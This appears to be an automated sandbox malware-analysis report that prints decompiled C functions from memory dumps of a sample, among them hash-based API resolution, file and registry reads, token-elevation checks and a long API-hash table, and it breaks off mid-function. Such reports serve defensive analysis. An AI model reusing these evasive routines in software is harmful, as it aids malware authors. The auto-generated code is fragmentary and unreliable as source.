Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
Instruction ID: 5d02b5e25fad9cde2daaa57a6eaa9fd3637e94d9e4bbf38815b08ee47870ee47
Opcode Fuzzy Hash: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
Instruction Fuzzy Hash: 0901423128420AFAFB902BF54D45FBB734CCF8235AF004835BA05651C8DE23A868E231

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6ED95C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6ED93064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6ED8C26C(_t23);
				if(E6ED8C280(_t23) != 0) {
					_t31[2] = E6ED935F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6ED93064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6ED93698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6ED93064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ed95c01
0x6ed95c05
0x6ed95c09
0x6ed95c12
0x6ed95c18
0x6ed95c19
0x6ed95c0b
0x6ed95c0d
0x6ed95c0d
0x6ed95c2f
0x6ed95c43
0x6ed95c31
0x6ed95c3e
0x6ed95c40
0x6ed95c40
0x6ed95c45
0x6ed95c4a
0x6ed95c58
0x6ed95cc3
0x6ed95cc6
0x6ed95c5a
0x6ed95c5f
0x6ed95cac
0x6ed95cb0
0x6ed95cba
0x6ed95cba
0x6ed95cb0
0x6ed95c61
0x6ed95c6d
0x6ed95c72
0x6ed95c86
0x6ed95c88
0x6ed95c89
0x6ed95c8a
0x6ed95c8c
0x6ed95c8e
0x6ed95c8f
0x6ed95c8f
0x6ed95c92
0x6ed95c92
0x6ed95c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED95C3E

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
Instruction ID: ca66a7c66f837f28ed6cde715b7a3a66c809a27de4d06ac3db5789f0de364708
Opcode Fuzzy Hash: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
Instruction Fuzzy Hash: 6001263528420AFAFB902BF14D45F7B774CDF8265DF004935FA09651C9DE23A968D231

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6ED95E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6ED8C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6ED93064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6ed95e14
0x6ed95e15
0x6ed95e17
0x6ed95e1d
0x6ed95e1f
0x6ed95e23
0x6ed95e23
0x6ed95e27
0x6ed95e33
0x6ed95e67
0x6ed95e67
0x00000000
0x6ed95e35
0x6ed95e3a
0x6ed95e3b
0x6ed95e4f
0x6ed95e60
0x6ed95e51
0x6ed95e5c
0x6ed95e5c
0x6ed95e65
0x6ed95e6d
0x6ed95e6f
0x6ed95e72
0x6ed95e77
0x6ed95e77
0x6ed95e7b
0x6ed95e80
0x00000000
0x00000000
0x00000000
0x6ed95e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6ED95D48,?,?), ref: 6ED95E5C

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
Instruction ID: 053d51d25aa6b5773937f937e28463d83e5e1aea751bda838322b78b40f73d9f
Opcode Fuzzy Hash: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
Instruction Fuzzy Hash: F6F04931A09B11F9D7515BB99C40B9F73E8DFD1760F104B39F580A7144E662C8409271

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED95E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6ED8C280(_t19) == 0) {
					_v12 = _a8;
					if(E6ED93064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6ED935F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6ed95e87
0x6ed95e89
0x6ed95e95
0x6ed95e9f
0x6ed95eb5
0x6ed95ed4
0x6ed95eb7
0x6ed95ec8
0x6ed95ecc
0x6ed95eec
0x6ed95ece
0x6ed95ece
0x6ed95ece
0x6ed95ecc
0x6ed95ed5
0x6ed95eda
0x6ed95ee3
0x6ed95edc
0x6ed95edc
0x6ed95ede
0x6ed95ede
0x6ed95e97
0x6ed95e97
0x6ed95e97
0x6ed95ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6ED95D79,00000000,?,00000000,?), ref: 6ED95EC8

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
Instruction ID: 2e1ca41c0058728ffd7b2505ab3eee24d02555e60cb6f65578de2e4058a4a345
Opcode Fuzzy Hash: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
Instruction Fuzzy Hash: 5CF03C31258207EFD791EFB99C10AAFB7D9AF49255F108D3AA899C6140EA33D418E631

Uniqueness

Uniqueness Score: -1.00%

Function 6ED9564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED9564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6ED93064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6ED8E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6ed95656
0x6ed95658
0x6ed9565f
0x6ed95661
0x6ed95665
0x6ed95667
0x6ed9566a
0x6ed9566d
0x6ed9566d
0x6ed95687
0x00000000
0x00000000
0x6ed95698
0x6ed9569c
0x00000000
0x00000000
0x6ed956aa
0x6ed956ad
0x6ed956b2
0x6ed956b7
0x6ed956b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6ED95698

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
Instruction ID: d7d07b3a42a102f3239244f48cbf1db3b218a4d7f0f2f8fd3537d11cd30a19be
Opcode Fuzzy Hash: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
Instruction Fuzzy Hash: 20F0C2B520030AAFE7249F5ACC54DBBBBFCEBC1B54F00892DA4D542200EA31AC50DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED91030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6ED91030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6ED9306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6ED9306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6ed9103e
0x6ed91040
0x6ed9104e
0x6ed91052
0x6ed9109b
0x00000000
0x6ed9109b
0x6ed91057
0x6ed91058
0x6ed9105a
0x6ed9105f
0x00000000
0x6ed91078
0x6ed9107c
0x6ed91089
0x6ed9108d
0x00000000
0x00000000
0x00000000
0x6ed91096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6ED91089

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 9e59a8e98b2734de8e3bfbc531cacf25b9aff5ebcc6eea26ce6586543c9419cc
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: FBF0C274344643EBFB409AB89C29F3F32ED5BC1614F418838B548CA194EF3AC8099222

Uniqueness

Uniqueness Score: -1.00%

Function 6ED93628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6ED93628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6ed9d228 == 0xa33c83e5) {
					_t7 = E6ED93064(0x60a28c5c, 0x1c6ef387);
					 *0x6ed9d22c = E6ED93064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6ed9d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6ed9d228 = 0;
					}
				}
				_t3 = E6ED93064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6ed9d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6ed93630
0x6ed93638
0x6ed9366b
0x6ed9367c
0x6ed93687
0x6ed93692
0x6ed93694
0x6ed93694
0x6ed93687
0x6ed93644
0x6ed9364b
0x00000000
0x6ed9364d
0x6ed9364d
0x6ed9364e
0x6ed93650
0x6ed93652
0x6ed93653
0x00000000
0x6ed93653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6ED8DE09,?,?), ref: 6ED93692

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 4c4b6627e82855753744cce98310dd6c8974ad7332477bf32751b13258595031
Instruction ID: 49e40cebddbd5a7e5a5c6df423a039506a7c4c7dcf1ea9487884a1ed6d118610
Opcode Fuzzy Hash: 4c4b6627e82855753744cce98310dd6c8974ad7332477bf32751b13258595031
Instruction Fuzzy Hash: 84F0E234256391FDEB601FEAAC08D52A6A8FF55699F000D39F28CA5204D6B1C880F636

Uniqueness

Uniqueness Score: -1.00%

Function 00AC1D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00AC1D76

Memory Dump Source

Source File: 00000000.00000002.621607284.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
Instruction ID: e9e794438438ea1987d221303e634f478e9d6aca820f899f2432c9e7c35dd910
Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
Instruction Fuzzy Hash: 4241D2B5E0521A9FDB08DF98D490BAEBBF0FF48314F15852DE849AB341D375A844CB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6ED81494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6ED81494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6ED8F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v76, E6ED8F4CC( &_v76) + 0x10);
				E6ED8F4BC( &_v80, E6ED8F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v84, E6ED8F4CC(_t325) + 0x10);
				E6ED8F4BC( &_v88, E6ED8F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v92, E6ED8F4CC(_t329) + 0x10);
				E6ED8F4BC( &_v96, E6ED8F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v100, E6ED8F4CC(_t333) + 0x10);
				E6ED8F4BC( &_v104, E6ED8F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v108, E6ED8F4CC(_t337) + 0x10);
				E6ED8F4BC( &_v112, E6ED8F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v116, E6ED8F4CC(_t341) + 0x10);
				E6ED8F4BC( &_v120, E6ED8F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v124, E6ED8F4CC(_t345) + 0x10);
				E6ED8F4BC( &_v128, E6ED8F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v132, E6ED8F4CC(_t349) + 0x10);
				E6ED8F4BC( &_v136, E6ED8F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v140, E6ED8F4CC(_t353) + 0x10);
				E6ED8F4BC( &_v144, E6ED8F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v148, E6ED8F4CC(_t357) + 0x10);
				E6ED8F4BC( &_v152, E6ED8F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v156, E6ED8F4CC(_t361) + 0x10);
				E6ED8F4BC( &_v160, E6ED8F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v164, E6ED8F4CC(_t365) + 0x10);
				E6ED8F4BC( &_v168, E6ED8F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v172, E6ED8F4CC(_t369) + 0x10);
				E6ED8F4BC( &_v176, E6ED8F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v180, E6ED8F4CC(_t373) + 0x10);
				E6ED8F4BC( &_v184, E6ED8F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v188, E6ED8F4CC(_t377) + 0x10);
				E6ED8F4BC( &_v192, E6ED8F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v196, E6ED8F4CC(_t381) + 0x10);
				E6ED8F4BC( &_v200, E6ED8F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v204, E6ED8F4CC(_t385) + 0x10);
				E6ED8F4BC( &_v208, E6ED8F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6ED94200(0x60a28c5c, _t434);
				E6ED8F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6ED8F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6ED8F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6ED8F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6ED8F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6ED8F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6ED8F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6ED8F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6ED8F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6ED8F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6ED8F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6ED8F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6ED8F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6ED8F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6ED8F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6ED8F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6ED8F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6ED81D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6ED8B27C( &_v248, _v256, _t481, _v252, _t318);
				E6ED8F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v296, E6ED8F4CC(_t410) + 0x10);
				E6ED8F4BC( &_v300, E6ED8F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v304, E6ED8F4CC(_t414) + 0x10);
				E6ED8F4BC( &_v308, E6ED8F4CC( &_v308) + 0xfffffff0);
